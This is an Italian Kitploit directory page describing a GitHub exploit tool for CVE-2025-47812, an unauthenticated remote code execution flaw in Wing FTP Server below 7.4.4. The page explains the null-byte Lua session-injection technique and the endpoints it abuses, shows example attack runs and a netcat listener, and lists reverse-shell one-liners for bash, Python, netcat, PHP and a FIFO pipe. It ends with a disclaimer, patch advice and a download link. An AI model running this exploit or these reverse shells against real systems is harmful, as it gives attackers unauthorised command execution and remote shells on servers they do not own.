Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-47812 — Exploit di esecuzione remota di codice non autenticato per Wing FTP Server < 7.4.4, che abilita l'esecuzione di comandi e reverse shell tramite iniezione Lua nei file di sessione. | Kitploit
Strumenti/GitHubGitHub/blindma1den/cve-2025-47812
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed TeamingStrumento di Accesso Remoto
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

Exploit di esecuzione remota di codice non autenticato per Wing FTP Server < 7.4.4, che abilita l'esecuzione di comandi e reverse shell tramite iniezione Lua nei file di sessione.

141 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
Condividi

CVE-2025-47812 - Esecuzione Remota di Codice (RCE) su Wing FTP Server

===========================================================

Autore: blindma1den

Data: Luglio 2025

Tipo di Exploit: Esecuzione Remota di Codice (Non Autenticato)

Target: Wing FTP Server < 7.4.4

Punteggio CVSS: 10.0 (Critico)


DESCRIZIONE

Questo script sfrutta CVE-2025-47812, una vulnerabilità critica nell'interfaccia web di Wing FTP Server che consente ad attaccanti remoti di eseguire comandi di sistema arbitrari o aprire una reverse shell senza autenticazione.

Il difetto è causato da una gestione impropria dei byte nulli (%00) nel modulo di login (/loginok.html). Ciò consente l'iniezione di codice Lua nei file di sessione, che vengono successivamente valutati quando vengono acceduti endpoint come /dir.html.


FONTI

Descrizione NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


CARATTERISTICHE

  • Esecuzione di comandi (es. whoami, uname -a)
  • Molteplici payload per reverse shell
  • Estrae automaticamente il cookie di sessione UID
  • Implementazione pulita e modulare in Python 3

  • REQUISITI

    • Python 3.7+
    • Modulo requests

    Installa le dipendenze:

    root@kitploit:~
    pip install requests
    

    UTILIZZO

    Esegui lo script:

    root@kitploit:~
    python3 wingftp_rce_exploit.py
    

    Ti verranno richiesti:

    • URL di destinazione (es. http://127.0.0.1:5466)
    • Nome utente (default: anonymous)
    • Modalità exploit: [1] Esegui un comando [2] Avvia una reverse shell

    ESEMPI

    [1] ESECUZIONE COMANDO:

    root@kitploit:~
    Target URL: http://192.168.1.10:5466
    Username: anonymous
    Your choice (1 or 2): 1
    Command to execute (default: whoami): whoami
    

    [2] REVERSE SHELL:

    root@kitploit:~
    Target URL: http://192.168.1.10:5466
    Username: anonymous
    Your choice (1 or 2): 2
    Reverse shell IP address: 192.168.1.100
    Reverse shell port: 4444
    

    Avvia il tuo listener prima di attivare la shell:

    root@kitploit:~
    nc -lvnp 4444
    

    PAYLOAD UTILIZZATI (REVERSE SHELL)

    Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

    Python3: python3 -c 'import socket,subprocess,os; ...'

    Netcat: nc IP PORT -e /bin/sh

    PHP: php -r '$sock=fsockopen("IP",PORT); ...'

    FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


    DICHIARAZIONE DI NON RESPONSABILITÀ

    Questo codice è solo a scopo educativo. NON utilizzare questo exploit contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione al test. L'uso non autorizzato è illegale e non etico.

    Applica immediatamente le patch ai tuoi sistemi. Wing FTP Server 7.4.4 risolve questa vulnerabilità.

    Buon hacking!

    Scarica lo strumento